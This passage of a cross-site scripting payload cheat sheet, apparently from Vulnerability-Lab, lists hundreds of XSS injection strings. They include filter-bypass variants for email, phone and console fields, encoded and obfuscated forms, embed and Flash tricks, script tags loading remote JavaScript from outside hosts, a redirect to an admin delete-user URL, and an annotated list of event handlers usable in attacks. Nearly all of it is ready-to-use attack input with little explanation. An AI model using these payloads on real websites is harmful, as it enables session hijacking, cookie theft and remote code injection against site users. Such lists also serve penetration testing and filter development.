<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with close TAG:

>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.cookie=true;">
>"<IMG SRC="javascript:document.cookie=true;">
>"<IMG SRC="  javascript:document.cookie=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
>"<SCRIPT>document.cookie=true;//<</SCRIPT>
>"<SCRIPT <B>document.cookie=true;</SCRIPT>
>"<IMG SRC="javascript:document.cookie=true;">
>"<iframe src="javascript:document.cookie=true;> 
>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
>"<BODY BACKGROUND="javascript:document.cookie=true;">
>"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNSRC="javascript:document.cookie=true;">
>"<IMG LOWSRC="javascript:document.cookie=true;">
>"<BGSOUND SRC="javascript:document.cookie=true;">
>"<BR SIZE="&{document.cookie=true}">
>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
>"¼script¾document.cookie=true;¼/script¾ 
>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.cookie=true;">
>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="background-image: url(
javascript:document.cookie=true;)">
>"<DIV STYLE="width: expression(document.cookie=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<BASE HREF="javascript:document.cookie=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"<img src="javascript:document.cookie=true;">
>"<img dynsrc="javascript:document.cookie=true;">
>"<input type="image" dynsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"&<script>document.cookie=true;</script> 
>"&{document.cookie=true;}; 
>"<img src=&{document.cookie=true;};> 
>"<link rel="stylesheet" href="javascript:document.cookie=true;"> 
>"<img src="mocha:document.cookie=true;"> 
>"<img src="livescript:document.cookie=true;"> 
>"<a href="about:<script>document.cookie=true;</script>"> 
>"<body onload="document.cookie=true;"> 
>"<div style="background-image: url(javascript:document.cookie=true;);"> 
>"<div style="behaviour: url([link to code]);"> 
>"<div style="binding: url([link to code]);"> 
>"<div style="width: expression(document.cookie=true;);">
>"<style type="text/javascript">document.cookie=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<script>document.cookie=true;//--></script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with negative value & TAG:
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC="  javascript:document.cookie=true;">
-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;> 
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
-1¼script¾document.cookie=true;¼/script¾ 
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(
javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script> 
-1&{document.cookie=true;}; 
-1<img src=&{document.cookie=true;};> 
-1<link rel="stylesheet" href="javascript:document.cookie=true;"> 
-1<img src="mocha:document.cookie=true;"> 
-1<img src="livescript:document.cookie=true;"> 
-1<a href="about:<script>document.cookie=true;</script>"> 
-1<body onload="document.cookie=true;"> 
-1<div style="background-image: url(javascript:document.cookie=true;);"> 
-1<div style="behaviour: url([link to code]);"> 
-1<div style="binding: url([link to code]);"> 
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>


Cross Site Scripting Strings Restriction Bypass Mail:

>"<iframe src=http://vulnerability-lab.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com

<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com


Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1


Cross Site Scripting Strings Restriction Bypass Obfuscation

>“<ScriPt>ALeRt("VlAb")</scriPt>
>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe> 


Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}



Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E



Cross Site Scripting Strings via Console:
set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out

<!--[if gte IE 4]>   <SCRIPT>alert('CrossSiteScripting');</SCRIPT>   <![endif]-->




Cross Site Scripting Strings  on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>



Cross Site Scripting Strings Embed:

<EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>



Cross Site Scripting Strings  Action Script:

       <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
           <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
                 <param name="quality" value="high" />
                 <param name="scale" value="noscale" />
                 <param name="salign" value="LT" />
       <param name="allowScriptAccess" value="always" />
                 <param name="menu" value="false" />
            </object>




<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>


<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav  ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
<IMG SRC="   javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-


<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>


<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>


<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(
javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">

<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <


<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">


<A HREF="http://server.com/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

<BASE HREF="javascript:alert('CrossSiteScripting');//">

\";alert('CrossSiteScripting');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">




<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">


¼script¾alert(¢CrossSiteScripting¢)¼/script¾



<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))">  exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");  CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>





a="get";
b="URL(\"";
c="javascript:";
d="alert('CrossSiteScripting');\")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
  <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
  <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>


<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser




%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

&#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

################################################################
Event Handlers 
It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates. 
The Dottoro Web Reference also has a nice list of events in JavaScript. 
1.	FSCommand() (attacker can use this when executed from within an embedded Flash object) 
2.	onAbort() (when user aborts the loading of an image) 
3.	onActivate() (when object is set as the active element) 
4.	onAfterPrint() (activates after user prints or previews print job) 
5.	onAfterUpdate() (activates on data object after updating data in the source object) 
6.	onBeforeActivate() (fires before the object is set as the active element) 
7.	onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function) 
8.	onBeforeCut() (attacker executes the attack string right before a selection is cut) 
9.	onBeforeDeactivate() (fires right after the activeElement is changed from the current object) 
10.	onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) 
11.	onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) 
12.	onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function). 
13.	onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) 
14.	onBeforeUpdate() (activates on data object before updating data in the source object) 
15.	onBegin() (the onbegin event fires immediately when the element's timeline begins) 
16.	onBlur() (in the case where another popup is loaded and window looses focus) 
17.	onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) 
18.	onCellChange() (fires when data changes in the data provider) 
19.	onChange() (select, text, or TEXTAREA field loses focus and its value has been modified) 
20.	onClick() (someone clicks on a form) 
21.	onContextMenu() (user would need to right click on attack area) 
22.	onControlSelect() (fires when the user is about to make a control selection of the object) 
23.	onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) 
24.	onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) 
25.	onDataAvailable() (user would need to change data in an element, or attacker could perform the same function) 
26.	onDataSetChanged() (fires when the data set exposed by a data source object changes) 
27.	onDataSetComplete() (fires to indicate that all data is available from the data source object) 
28.	onDblClick() (user double-clicks a form element or a link) 
29.	onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) 
30.	onDrag() (requires that the user drags an object) 
31.	onDragEnd() (requires that the user drags an object) 
32.	onDragLeave() (requires that the user drags an object off a valid location) 
33.	onDragEnter() (requires that the user drags an object into a valid location) 
34.	onDragOver() (requires that the user drags an object into a valid location) 
35.	onDragDrop() (user drops an object (e.g. file) onto the browser window) 
36.	onDragStart() (occurs when user starts drag operation) 
37.	onDrop() (user drops an object (e.g. file) onto the browser window) 
38.	onEnd() (the onEnd event fires when the timeline ends. 
39.	onError() (loading of a document or image causes an error) 
40.	onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) 
41.	onFilterChange() (fires when a visual filter completes state change) 
42.	onFinish() (attacker can create the exploit when marquee is finished looping) 
43.	onFocus() (attacker executes the attack string when the window gets focus) 
44.	onFocusIn() (attacker executes the attack string when window gets focus) 
45.	onFocusOut() (attacker executes the attack string when window looses focus) 
46.	onHashChange() (fires when the fragment identifier part of the document's current address changed) 
47.	onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) 
48.	onInput() (the text content of an element is changed through the user interface) 
49.	onKeyDown() (user depresses a key) 
50.	onKeyPress() (user presses or holds down a key) 
51.	onKeyUp() (user releases a key) 
52.	onLayoutComplete() (user would have to print or print preview) 
53.	onLoad() (attacker executes the attack string after the window loads) 
54.	onLoseCapture() (can be exploited by the releaseCapture() method) 
55.	onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing) 
56.	onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem) 
57.	onMessage() (fire when the document received a message) 
58.	onMouseDown() (the attacker would need to get the user to click on an image) 
59.	onMouseEnter() (cursor moves over an object or area) 
60.	onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) 
61.	onMouseMove() (the attacker would need to get the user to mouse over an image or table) 
62.	onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) 
63.	onMouseOver() (cursor moves over an object or area) 
64.	onMouseUp() (the attacker would need to get the user to click on an image) 
65.	onMouseWheel() (the attacker would need to get the user to use their mouse wheel) 
66.	onMove() (user or attacker would move the page) 
67.	onMoveEnd() (user or attacker would move the page) 
68.	onMoveStart() (user or attacker would move the page) 
69.	onOffline() (occurs if the browser is working in online mode and it starts to work offline) 
70.	onOnline() (occurs if the browser is working in offline mode and it starts to work online) 
71.	onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline) 
72.	onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) 
73.	onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element) 
74.	onPopState() (fires when user navigated the session history) 
75.	onProgress() (attacker would use this as a flash movie was loading) 
76.	onPropertyChange() (user or attacker would need to change an element property) 
77.	onReadyStateChange() (user or attacker would need to change an element property) 
78.	onRedo() (user went forward in undo transaction history) 
79.	onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle) 
80.	onReset() (user or attacker resets a form) 
81.	onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) 
82.	onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) 
83.	onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>) 
84.	onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element) 
85.	onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) 
86.	onRowsEnter() (user or attacker would need to change a row in a data source) 
87.	onRowExit() (user or attacker would need to change a row in a data source) 
88.	onRowDelete() (user or attacker would need to delete a row in a data source) 
